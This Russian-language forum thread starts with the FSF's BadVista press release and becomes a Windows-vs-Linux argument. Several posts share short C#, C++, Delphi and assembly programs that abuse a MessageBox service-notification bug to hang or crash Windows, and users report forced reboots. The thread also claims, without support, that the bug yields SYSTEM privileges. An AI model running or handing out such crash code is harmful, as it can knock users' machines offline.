Электростальский форум
Hi-Tech => Компьютеры, периферия, мультимедиа и ПО => Тема начата: exBoMBeR от 16.01.07, 14:46:36
-
BadVista.org: FSF начинает кампанию против Microsoft Vista
Пресс-релиз Free Software Foundation (FSF)
Перевод: CITKIT.ru
http://badvista.org
18 декабря 2006 г
15 декабря 2006 г. организация Free Software Foundation (FSF) объявила о начале кампании BadVista.org, преследующей цели разъяснения вреда, который принесет пользователям компьютеров новая операционная система Microsoft Windows Vista, и пропаганды альтернатив из области свободного программного обеспечения, не подрывающих безопасность пользователей и поддерживающих их права на частную жизнь.
По словам администратора программ FSF Джона Салливана (John Sullivan), ?В Vista под видом дополнительных средств содержатся очень опасные вещи. Эти вещи особенно опасны с точки зрения наиболее важного аспекта владения компьютером и его использования ? возможности контроля его работы. Конечно, операционные системы Windows всегда были проприетарными и очень ограничительными, и это их сильно обесценивало. Но новые ?средства? ОС Vista являются ?троянским конем?, предназначенным для привнесения еще больших ограничений. Мы сконцентрируемся на выяснении подробностей работы этих средств, на том, как можно им противодействовать, и на том, почему люди должны быть бдительны.?
При проведении кампании будут организовываться эффективные и нестандартные акции ее сторонников, обращающие внимание публики на подрыв прав пользователей компьютеров, собираться факты, развенчивающие маркетинговую пропаганду Vista, и предоставляться дружественный к пользователю путь к переходу к использованию свободных операционных систем, таких, как gNewSense (http://www.gnewsense.org).
Исполнительный директор FSF Питер Браун (Peter Brown) заявил следующее: ?Пока компания Microsoft выводит на рынок свой наиболее крупный за всю ее историю продукт, маркетинговые деньги будут тратиться на попытки одурачить средства массовой информации и сообщество пользователей по поводу целей Vista. Наша кампания предназначена для предоставления ответов на важные вопросы. Можете ли вы освободить самого себя или свою компанию? Можете ли вы когда-нибудь освободиться от Microsoft? Как и в нашей кампании против ?Управления цифровыми ограничениями? (?Digital Restrictions Management?), мы стремимся продемонстрировать, что технические специалисты могут занимать активную общественную позицию, поскольку мы знаем о вреде, который принесет Vista?.
Среди прочего, BadVista.org будет концентрироваться на опасности, которую в Vista представляет ?вероломный компьютинг? (Treacherous Computing). Этот подход, обычно называемый в индустрии ?доверительным компьютингом? (Trusted Computing), представляет собой попытку превратить компьютеры из машин, управляемых своими пользователями, в машины, которые следят за своими пользователями и отказываются выполнять действия, которые не разрешены их производителями. Сторонники этих взглядов могут подписаться на получение дополнительной информации и участие в кампании на сайте http://badvista.org.
-
Бред, ИМХО Люди наверно денег чтоли хотят срубить, типа как Евросоюз время от времени доит Microsoft.
-
моська лает на слона
-
Бред, ИМХО Люди наверно денег чтоли хотят срубить, типа как Евросоюз время от времени доит Microsoft.
Согласен, чужая слава видимо покоя не даёт.
-
Согласен, чужая слава видимо покоя не даёт.
Слава самой небезопасной и ненадежной системы???
-
Слава самой небезопасной и ненадежной системы???
Позволю себе с вами не согласиться...приводить доказательства оч оч оч оч ломает, но если уж все настаивают...
-
Слава самой небезопасной и ненадежной системы???
Позволю себе с вами не согласиться...приводить доказательства оч оч оч оч ломает, но если уж все настаивают...
значит делать (Вам) нечего ;)
-
Ну может конечно кому то даже нравится что его личные данные могут быть доступны третьим лицам или что кто то извне сможет иметь свободный ничем не ограниченный доступ к файлам на их компьютере - пожалуйста ... мало ли у нас извращенцев.
У пользователя виндовс есть тока 2 пути - постоянно крутиться устанавливая программы заглушки и скачивая все новые и новые сервис паки затыкающие все новые и новые уязвимости и черные ходы заботливо установленные разработчиками или ... смириться с тем что в любой момент некто может получить полный доступ к еге данным и сделать с ними что угодно [[knife]]
Как говорится, если ваш компьютер работающий под Windows еще не взломали и на него не установлено шпионское ПО следящее за вами есть только одна причина - вы пока еще никому не интересны [[curtain]]
-
Слава самой небезопасной и ненадежной системы???
Позволю себе с вами не согласиться...приводить доказательства оч оч оч оч ломает, но если уж все настаивают...
Вы меня улыбаете.
Вот вам код, выдает с десяток Мессадж боксов , а затем Синий экран.
Вешать винду и получить привиллегии System через WIN API MessageBox ....
Эта бага (виндузятники, конечно, скажут что это фича такая) до сих пор не пофиксена. Работает от НТ до Висты.
[DllImport("user32.dll")]unsafe public static extern int MessageBoxA(uint hwnd, byte* lpText, byte* lpCaption, uint uType);
static unsafe void Main()
{
byte[] helloBug = new byte[] {0x5C, 0x3F, 0x3F, 0x5C, 0x21, 0x21, 0x21, 0x00};
uint MB_SERVICE_NOTIFICATION = 0x00200000u;
fixed(byte* pHelloBug = &helloBug[0])
{
for(int i=0; i<10; i++)
MessageBoxA(0u, pHelloBug, pHelloBug, MB_SERVICE_NOTIFICATION);
}
}
Расширение zip поменяйте на exe
-
Вариант на С++:
char bug [] = "\\??\\C:\\";
for(int i = 0; i < 10; i ++)
{
::MessageBoxA(0, bug, bug, MB_SERVICE_NOTIFICATION);
}
Наглядно показывает компетентность людей, разрабатывающих ось и ее ядро...
-
Вот вам код <...>
Фигасе, кто-то это себе загружает...
-
Вот вам код <...>
Фигасе, кто-то это себе загружает...
Это весит 0 байт, там нечего загружать.
-
Вот вам код <...>
Фигасе, кто-то это себе загружает...
Это весит 0 байт, там нечего загружать.
сорри, перезалил
-
Никакого синего экрана, только вот это:
-
Никакого синего экрана, только вот это:
.NET версии хотя бы 1.1 стоит?
Если нет, можешь компильнуть с++ код. Ну или вот тебе Дельфи:
var bug:PChar;
i:byte;
begin
bug := '\??\C:\';
for i := 0 to 10 do MessageBox(0, bug, bug, MB_SERVICE_NOTIFICATION);
end;
Кстати, вешается даже из под Guest
http://www.kuban.ru/forum_new/forum2/files/19124.html
-
Гы ... где то, не помню где, прочитал что по какой та статистике компьютер под Виндоуз будучи подключенным к инету по не защищенному каналу живет не зараженным в среднем 30 секунд ... при этом даже не надо куда то коннектиться или что то запускать - достаточно подключиться к сети [preved]
-
Согласен, чужая слава видимо покоя не даёт.
Слава самой небезопасной и ненадежной системы???
Нет, слава самой распространённой, удобной в использовании и простой для пользователя. А на счёт безопасности, источника назвать не могу (не помню) но читал, что при установке всех заплаток виндовс выигрывает в безопасности у альтернативных операционок.
-
Никакого синего экрана, только вот это:
.NET версии хотя бы 1.1 стоит?
Я из любопытства тупо запустил твой экзешник, результат выше. Сейчас может попробую скомпелить исходник.
-
Нет, слава самой распространённой, удобной в использовании и простой для пользователя. А на счёт безопасности, источника назвать не могу (не помню) но читал, что при установке всех заплаток виндовс выигрывает в безопасности у альтернативных операционок.
Из всего вышеназванного объективной правдой можно считать только самой распространённой
Насчет удобства в использовании - современные линуксы гораздо удобнее ... попробуйте любой дистрибьютив 2006 года рождения ...
Простота для пользователя? Куда уж проще ... в современном линуксе все и так ставится и работает само.
А в то что виндовс безопасна верят только ее разработчики ... и легковнушаемые доверчивые пользователи.
-
Вариант на С++:
char bug [] = "\\??\\C:\\";
for(int i = 0; i < 10; i ++)
{
::MessageBoxA(0, bug, bug, MB_SERVICE_NOTIFICATION);
}
Наглядно показывает компетентность людей, разрабатывающих ось и ее ядро...
#*_!!! код работает!
тока что перезагружал машину...
VS 2003, ОС XP sp2
единственное, пришлось добавить #define _WIN32_WINNT 0x0400
exBoMBeR, ну ты держи в курсе, что они там на этом сайте откопают, какие трояны в Висте
-
Короче опять Windows vs Linux [[dozey]]...сейчас еще Нервный подтянется...
А про безопасность я имел ввиду отличия Висты от других виндов, а не в целом от систем
-
Короче опять Windows vs Linux [[dozey]]...сейчас еще Нервный подтянется...
А про безопасность я имел ввиду отличия Висты от других виндов, а не в целом от систем
При чем здесь Windows vs Linux? Как находят дырку в винде, так сразу виндузятники поднимают эту тему. Relax господа. Уверен, руководство Майкрософта уже наказало руководителей и программистов с тестерами.
-
Бред, ИМХО Люди наверно денег чтоли хотят срубить, типа как Евросоюз время от времени доит Microsoft.
Точно. Лучше чего-нибудь поумнее бы придумали.
-
А в то что виндовс безопасна верят только ее разработчики ... и легковнушаемые доверчивые пользователи.
Ага. А также банки, страховые компании, и прочие дебилы. Бред не несите. Сделайте себе тему отдельную и пишите там.Честно слово тяжело было аж три темы с бредятиной скроллить.
PS Прошу прощения за резкий тон. Только что приехал с нифигового секса со связкой Солярис 10 +Oracle 10g R2 на SUN.
Униксоиды, скажите плиз, ну ПОЧЕМУ в этой супер крутой и надежной системе, импорт данных идет в разы медленнее, чем на сервере под виндой(при то что виндовый сервер стоит в 10 раз дешевле по железу). Почему эта, мать ее, и мать лично Торвальда(хоть он и не причем), система без платного(дорогущего) софта от веритас жить не хочет? Не расскажете?,
PPS Смешно слушать про безопасность,от людей юзающих софт, в котором сброс рутового пароля в документации расписан.:)
PPPS ... где то, не помню где, прочитал что по какой та статистике компьютер под Виндоуз будучи подключенным к инету по не защищенному каналу живет не зараженным в среднем 30 секунд ... при этом даже не надо куда то коннектиться или что то запускать - достаточно подключиться к сети
Домашнему компу года два. Подключен напрямую в интернет без всяких натов со статическим адресом.. Файрвол только встроенный в XP. Антивируса отродясь не было. Комп включен почти всегда.Открыто RDP с работы и еще пара штук. И ничего...живу как то.Представляете?
-
PPS Смешно слушать про безопасность,от людей юзающих софт, в котором сброс рутового пароля в документации расписан.:)
Еще смешнее слушать виндузятников, которые умалчивают про сброс пароля админа с помощью дискетки (флешки, сидюка).
Ну как и ожидалось, виндузятники вместо того, чтобы заняться своей любимой виндой, начали holy_war.
-
Еще смешнее слушать виндузятников, которые умалчивают про сброс пароля админа с помощью дискетки (флешки, сидюка).
Ага-ага. Давайте так. Я вам даю комп с Win 2003. У вас есть два часа, любые диски и проч. Задача войти в систему ,с правами админа. Ставка 500 баксов. Слабо?
PS Использование с моей стороны ВСЕХ технологий специально разработанных,для того что бы предотвратить сброс пароля подобным образом -не возбраняется.
-
в инете уже объявлена (по-моему мелкософтом) плата за взлом висты и 7-го эксплорера - 8000 долларов кажется.
вэлкам!
-
> Насчет удобства в использовании - современные линуксы гораздо удобнее ... попробуйте любой дистрибьютив 2006 года рождения ...
Я это слышу с 1996-го года. Всё один-в-один. Тока года менялись. Линупсу до уровня Windows 95 как до Луны раком до сих пор.
-
> FSF начинает кампанию против Microsoft Vista
FSF начинает рекламную кампанию Windows Vista ? o_O.
Дружочки, есть неглаcное правило - никогда не упоминать имя конкурента. НИКОГДА. Иначе ваша "кампания" превратится в рекламу конкурента. Если этого не делается - я вам даю гарантию, здесь что-то не так. Думайте.
-
Вообще то последние линуксы действительно стали предельно простыми в использовании. Разумеется за счет того, что в ядро напихали много-много не всегда нужных модулей, но тем не менее. Тот же Linux-xp на вид сложно отличить от винды. А кто то не разбирающийся в таких делах может и нормально под ним поработать и даже не понять, что это была не винда.
-
В принципе последняя причина продолжать пользоваться форточками - игрушки ... можно надеяться и это не на долго.
Кстати, на ftp-шнике ID Software уже пылятся linux-версии их хитов - Quake2, 3, 4, Doom 3, Wolfenstein 3 и т.д.
Требуется только иметь более менее свежую версию Xorg с поддержкой аппаратного OpenGL ...
-
Еще смешнее слушать виндузятников, которые умалчивают про сброс пароля админа с помощью дискетки (флешки, сидюка).
Ага-ага. Давайте так. Я вам даю комп с Win 2003. У вас есть два часа, любые диски и проч. Задача войти в систему ,с правами админа. Ставка 500 баксов. Слабо?
PS Использование с моей стороны ВСЕХ технологий специально разработанных,для того что бы предотвратить сброс пароля подобным образом -не возбраняется.
Ну другого я не ожидал. Мы веДь говорим про винду и линукс с нуля? Тогда при чем здесь выделенное? На линуксе ведь тоже можно сделать: запретить бутится с cdrom/дискеты,поставить пароль на lilo/grub и т.д и т.п...
Мелкор, жаль, но вы скатились до уровня Нервного. Раньше было интересно вас читать.
ЗЫ. Лучше бы, придумали умного по защите винды от "синей смерти" (через WINAPI MessageBox).
ЗЫЫ. Оффтоп - Фанатики (Человек, отличающийся исступленной религиозностью, крайней нетерпимостью, изувер) определенной ОС , а чем вы отличаетесь от секты Иеговы, или от идейных коммунистов (капиталистов,коллаборационистов и прочих) которые кучу людей загубили? Да ничем! Заповедь: "Не сотвори себе кумира". Мне что-то не нравится в Винде, мне что-то не нравится в Юниксе... Но это не мешает мне использовать их для определенных задач. Хотя признаться, Винду использую намного реже.
-
А в то что виндовс безопасна верят только ее разработчики ... и легковнушаемые доверчивые пользователи.
Ага. А также банки, страховые компании, и прочие дебилы. Бред не несите. Сделайте себе тему отдельную и пишите там.Честно слово тяжело было аж три темы с бредятиной скроллить.
PS Прошу прощения за резкий тон. Только что приехал с нифигового секса со связкой Солярис 10 +Oracle 10g R2 на SUN.
Униксоиды, скажите плиз, ну ПОЧЕМУ в этой супер крутой и надежной системе, импорт данных идет в разы медленнее, чем на сервере под виндой(при то что виндовый сервер стоит в 10 раз дешевле по железу). Почему эта, мать ее, и мать лично Торвальда(хоть он и не причем), система без платного(дорогущего) софта от веритас жить не хочет? Не расскажете?,
Гм, а не пробовали поставить Оракл 10g на железо НР с Оптеронами под управлением СУСЕ Линукс Интерпрайз Сервер 10, а базу разместить на тома под управлением тогоже Оракл АМС?
-
> Еще смешнее слушать виндузятников, которые умалчивают про сброс пароля админа с помощью дискетки (флешки, сидюка).
А ещё смешнее - линуксойдов, которые умалчивают про сброс пароля админа с помощью дискетки (флешки, сидюка). Защита на таком уровне не только не нужна никому, она просто вредна, если попытаться подумать остатками мозга.
-
> Еще смешнее слушать виндузятников, которые умалчивают про сброс пароля админа с помощью дискетки (флешки, сидюка).
А ещё смешнее - линуксойдов, которые умалчивают про сброс пароля админа с помощью дискетки (флешки, сидюка). Защита на таком уровне не только не нужна никому, она просто вредна, если попытаться подумать остатками мозга.
lenin, успокойтесь. Вас не интересно читать. Читайте всю тему, прежде чем леЗть сюда со своими комментами. Это был ответ Мелкору на то, что в линуксе есть возможность сбросить пароль рута.
-
> Тот же Linux-xp на вид сложно отличить от винды.
Ну если за монитором - дэбил, то да, сложно. Как можно не отличать сверхубогий рендеринг фонтов липупса от Венды даже образца 1995-го, я не знаю.
Вот расскажите линуксойды, как в ваших поделках просто и очевидно, как в диспетчере устройств Windows 95, которой более 10 лет, определить, на какое устройство у меня нет драйвера ? А никак. Это в общем случае вообще в линуксе никак не сделать.
А как в вашем линупсе посмотреть лицензинный DVD ? Лицензионный, с защитой от копирования. А никак. Линупсячие плееры все софтверные, а привод с защищённого DVD не прочтёт ни байта.
И что самое замечательное - это отмазка липуспойдов на все случаи - а это не надо. Не поддерживал их фетиш NCQ до ядра 2.6.18 - было не надо. Не прошло и 4-х лет, c момента, каке венда это уже умела - срочно понадобился. Тьфу, надоело.
-
Гы ... где то, не помню где, прочитал что по какой та статистике компьютер под Виндоуз будучи подключенным к инету по не защищенному каналу живет не зараженным в среднем 30 секунд ... при этом даже не надо куда то коннектиться или что то запускать - достаточно подключиться к сети [preved]
А Вы не читайте туфту, а попроуйте. Установите Windows XP SP 2 с инсталляционного диска, подключитесь к Сети и ждите с секундомером. Тока пищу не забывайте принимать.
-
Вообще то последние линуксы действительно стали предельно простыми в использовании. Разумеется за счет того, что в ядро напихали много-много не всегда нужных модулей, но тем не менее.
Это как простите? Ну если вас так напрягают модули ядра =) , то rmmod и правка modules.conf, и modprobe.conf помогут =)
Кто утверждает, что Виста защищенная система, тот, видимо, не особо следит за новостями - еще в середине декабря было найдены
уязвимости, причем они "бородатые" - Виста унаследовала их от ХП ( вирусы: Stratio-Zip, Netsky-D, MyDoom-O ). Так же ядро Висты тоже было уже взломано ( конференция хакеров BlackHat 2006 ).
Но все таки не стоит быть категоричным в отношении Висты - серьезную работу по повышению безопасности ОС Майкрософт провели - PatchGuard, к примеру.
Короче, время покажет. Но то, что Виста унаследовала старые дырки это, конечно, настораживает.
-
Гм, а не пробовали поставить Оракл 10g на железо НР с Оптеронами под управлением СУСЕ Линукс Интерпрайз Сервер 10, а базу разместить на тома под управлением тогоже Оракл АМС?
Нет. И не буду. восьмиядерные спарки все таки рулят. Жаль правда, что SUN свернула продажи своих серверов. И на самом деле проблему то решили вчера. Просто заказчик попал на бабло от веритас.
Ну другого я не ожидал. Мы веДь говорим про винду и линукс с нуля? Тогда при чем здесь выделенное? На линуксе ведь тоже можно сделать: запретить бутится с cdrom/дискеты,поставить пароль на lilo/grub и т.д и т.п...
Я говорил про стандартные средства винды. В частности, про вынесение хешированных паролей на сьемный носитель(syskey). Про запрет пустых паролей(и тогда линукс не умеющий осмысленно писать в NTFS резко перекурит в сторонке) и прочие милые вещи. Ведь говоря о защищенности мы подразумеваем, что защищенный сервер-это тот сервер, у которого, руками админа, эта самая защищенность настроена. Не так ли? При этом , помимо защищенности от удаленного доступа(в первую очередь), обычно настраивают всякие биометрические приблуды, смаркарты и проч, для защиты от физического доступа, и уж безусловно принимают меры, для того, если биометрические и прочие штуки обойдутся хакером, все равно фиг у него чего получилось бы. Вот это и есть защищенный сервер. Или вы имели в виду свежепоставленный и непропатченный Windows 95? Тогда да. Тогда вы правы.
запретить бутится с cdrom/дискеты
Это как простите? Линукс уже научился указывать биосу, с чего ему грузиться? Да так , что и не обойдешь?
ЗЫЫ. Оффтоп - Фанатики (Человек, отличающийся исступленной религиозностью, крайней нетерпимостью, изувер) определенной ОС , а чем вы отличаетесь от секты Иеговы, или от идейных коммунистов (капиталистов,коллаборационистов и прочих) которые кучу людей загубили? Да ничем! Заповедь: "Не сотвори себе кумира". Мне что-то не нравится в Винде, мне что-то не нравится в Юниксе... Но это не мешает мне использовать их для определенных задач. Хотя признаться, Винду использую намного реже.
Мне пофиг что использовать. Соляру, AIX, винду или еще что-то. Все бывает в меру полезно.Свои преимущества есть у всего . Мне просто непонятна позиция людей, которые тупо обвиняют винду в незащищенности и "вообще сакс", не видя ни одного по нормальному защищенного сервера под управлением Windows.
Установите Windows XP SP 2 с инсталляционного диска, подключитесь к Сети и ждите с секундомером.Тока пищу не забывайте принимать.
Уже два года жду.Подтверждаю, без пищи будет тяжело.
-
А Вы не читайте туфту, а попроуйте. Установите Windows XP SP 2 с инсталляционного диска, подключитесь к Сети и ждите с секундомером. Тока пищу не забывайте принимать.
А я так попадал, кстати. Правда, второго сервис пака тогда еще не было. Установил Виндовз, через несколько минут поймал ловесана. С тех пор
Вянду устанавливаю только с отключенной сетью - пока фаервол не поставлю, не включаю.
-
в инете уже объявлена (по-моему мелкософтом) плата за взлом висты и 7-го эксплорера - 8000 долларов кажется.
вэлкам!
угу, только не мелкософтом..
Американская компания iDefence, занимающаяся вопросами компьютерной безопасности, объявила о вознаграждении в 8 тысяч долларов хакерам, которым удастся обнаружить уязвимости в браузере Internet Explorer 7 и новейшей операционной системе от Microsoft Windows Vista, сообщает PC Magazine.
Конкурс хакеров станет частью программы ?деньги-за-уязвимость? (pay-for-flaw), целью которой является улучшение систем безопасности наиболее популярного программного обеспечения. Приз в 8 тысяч долларов получат только шесть умельцев, которые раньше всех пришлют результаты своей хакерской деятельности специалистам iDefence.
Для того, чтобы получить денежное вознаграждение, необходимо, чтобы обнаруженной уязвимостью можно было воспользоваться с удаленного компьютера, причем она должна присутствовать во всех последних обновления и дополнениях к IE или Vista. Ошибки, найденные в бета-версиях продуктов, поощряться вознаграждением не будут.
В настоящий момент iDefence ? далеко не единственная компания, согласная платить хакерам деньги за поиск уязвимостей в программах. Так, некоторое время назад Trend Micro организовала подобный конкурс с призовым фондом в 50 тысяч долларов. Награда досталась хакерам, сумевшим обнаружить уязвимости в Vista.
отсюда (http://www.lenta.ru/news/2007/01/11/payhack/)
-
18:04 16.02.2006
Британские власти требуют уязвимостей в Windows Vista
ИА "Клерк.Ру". Отдел новостей / Британские власти ведут переговоры с представителями Microsoft по поводу умышленного создания уязвимостей в системе защиты новой операционной системе Windows Vista, - чтобы сотрудники спецслужб могли проникать в компьютеры злоумышленников, сообщает BBC.
В связи с грядущим появлением новой операционной системы Windows Vista ученый из Кембриджского университета обратился к различным правительственным структурам с просьбой оказать давление на Microsoft и вынудить компанию умышленно создать ряд "лазеек" в защитной системе ОС Vista.
Академик Кембриджского университета Росс Андерсон выразил обеспокоенность по поводу того, данные, хранящиеся на машинах, работающих под управлением новой ОС будут слишком хорошо закодированы. Андерсон, специализирующийся в области систем безопасности, обратился с заявлением к британской Палате общин. В своем докладе профессор представил ряд доказательств необходимости умышленного создания уязвимостей в системе Vista. По его словам, это "поможет предотвратить террористические акты". Официальные лица сообщили, что переговоры об этом уже ведутся с Microsoft.
Напомним, что новая ОС от Microsoft использует систему кодирования файлов BitLocker Drive Encryption, связанную с чипом TPM (Trusted Platform Module) на материнской плате компьютера.
Представители Microsoft заявили, что Windows Vista - это самая защищенная из когда-либо созданных компанией Microsoft операционных систем. В то же время, сотрудники компании помогают силам охраны правопорядка разобраться в защитной системе Vista с целью предотвращения преступлений и продолжают тесное сотрудничество с правительственными организациями, чтобы сделать интернет максимально безопасным.
-
Вариант на С++:
char bug [] = "\\??\\C:\\";
for(int i = 0; i < 10; i ++)
{
::MessageBoxA(0, bug, bug, MB_SERVICE_NOTIFICATION);
}
Наглядно показывает компетентность людей, разрабатывающих ось и ее ядро...
Попробовал скормить своему ассемблеру вот это ...
format PE GUI 4.0
include '%fasminc%\win32a.inc'
start:
mov ecx, 10
.bug_loop:
push ecx
invoke MessageBox, 0, bug_text, bug_text, MB_SERVICE_NOTIFICATION
pop ecx
loop .bug_loop
exit:
invoke ExitProcess, 0
bug_text db "\??\C:\", 0
data import
library kernel32, 'KERNEL32.DLL',\
user32, 'USER32.DLL'
import kernel32,\
ExitProcess,'ExitProcess'
import user32,\
MessageBox,'MessageBoxA'
end data
и запустить под Windows 2000 SP3 ... синего экрана не получилось, но комп пришлось перегружать резетом - все перестало запускаться/выключаться ... намертво завис даже диспечер задач. В зипе - получившийся экзешник (1кб весом) ... дальше полученные на экране мессаж боксы ...
Эх ... сколько я не прогал - добиться подобной нестабильности ядра от того же линукса мне так и не удалось даже используя напрямую системные вызовы int 0x80 ...
P.S. Попробовал дома этот же код под OEM версией Windows XP Home SP2 ... никакой реакции - показывает 10 мессаж боксов и продолжает нормально работать.
-
18:04 16.02.2006
Британские власти требуют уязвимостей в Windows Vista
чота это бред какойта. больше не рекламу похоже
-
Бред, ИМХО Люди наверно денег чтоли хотят срубить, типа как Евросоюз время от времени доит Microsoft.
Согласен!!! Это или сами Майкрософт для повышения популярности бучу подняли, либо завистники!!!!
-
Бред, ИМХО Люди наверно денег чтоли хотят срубить, типа как Евросоюз время от времени доит Microsoft.
Согласен!!! Это или сами Майкрософт для повышения популярности бучу подняли, либо завистники!!!!
Всегда умиляет подобные высказывания ... по вашему мир делится на Мелкософт и его завистников??? Т.е. если вас зовут не Билл Гейтс значит вы его завистник??? Ужос!!!
-
мир делится на 2 части: Первая не любит Билла Гейтса, вторая о нем не знает.
-
2Pantera:
Ну так что ? Принимаете пари? У вас будут такие возможности каких нет ни одного хакера. Вам не придется убивать охрану. Вам не придется искать с кого бы срезать палец, для того чтобы пройти биометрические тесты. Вам не придется судорожно искать способ вскрыть корпус сервера без мгновенного уничтожения данных, для того, чтобы подрубить к нему CD-ROM ( и это при вое сирен и едущей охране) ... Да много чего не придется...
В общем условия просто халявные. Тем более перед вами совершенно незащищенная система(судя по вашим словам):) Можете ломать локально, можете удаленно. Прям таки халявные 500 баксов так в руку и просятся.
Слабо?
-
Слава самой небезопасной и ненадежной системы???
Позволю себе с вами не согласиться...приводить доказательства оч оч оч оч ломает, но если уж все настаивают...
Вы меня улыбаете.
Вот вам код, выдает с десяток Мессадж боксов , а затем Синий экран.
Вешать винду и получить привиллегии System через WIN API MessageBox ....
Эта бага (виндузятники, конечно, скажут что это фича такая) до сих пор не пофиксена. Работает от НТ до Висты.
[DllImport("user32.dll")]unsafe public static extern int MessageBoxA(uint hwnd, byte* lpText, byte* lpCaption, uint uType);
static unsafe void Main()
{
byte[] helloBug = new byte[] {0x5C, 0x3F, 0x3F, 0x5C, 0x21, 0x21, 0x21, 0x00};
uint MB_SERVICE_NOTIFICATION = 0x00200000u;
fixed(byte* pHelloBug = &helloBug[0])
{
for(int i=0; i<10; i++)
MessageBoxA(0u, pHelloBug, pHelloBug, MB_SERVICE_NOTIFICATION);
}
}
Расширение zip поменяйте на exe
У меня вообще написал "Необходимый файл динамической библиотеки MSCOREE>DLL не найден" :)
-
Вариант на С++:
char bug [] = "\\??\\C:\\";
for(int i = 0; i < 10; i ++)
{
::MessageBoxA(0, bug, bug, MB_SERVICE_NOTIFICATION);
}
Наглядно показывает компетентность людей, разрабатывающих ось и ее ядро...
Попробовал скормить своему ассемблеру вот это ...
format PE GUI 4.0
include '%fasminc%\win32a.inc'
start:
mov ecx, 10
.bug_loop:
push ecx
invoke MessageBox, 0, bug_text, bug_text, MB_SERVICE_NOTIFICATION
pop ecx
loop .bug_loop
exit:
invoke ExitProcess, 0
bug_text db "\??\C:\", 0
data import
library kernel32, 'KERNEL32.DLL',\
user32, 'USER32.DLL'
import kernel32,\
ExitProcess,'ExitProcess'
import user32,\
MessageBox,'MessageBoxA'
end data
и запустить под Windows 2000 SP3 ... синего экрана не получилось, но комп пришлось перегружать резетом - все перестало запускаться/выключаться ... намертво завис даже диспечер задач. В зипе - получившийся экзешник (1кб весом) ... дальше полученные на экране мессаж боксы ...
Эх ... сколько я не прогал - добиться подобной нестабильности ядра от того же линукса мне так и не удалось даже используя напрямую системные вызовы int 0x80 ...
P.S. Попробовал дома этот же код под OEM версией Windows XP Home SP2 ... никакой реакции - показывает 10 мессаж боксов и продолжает нормально работать.
А в МЕ нормально все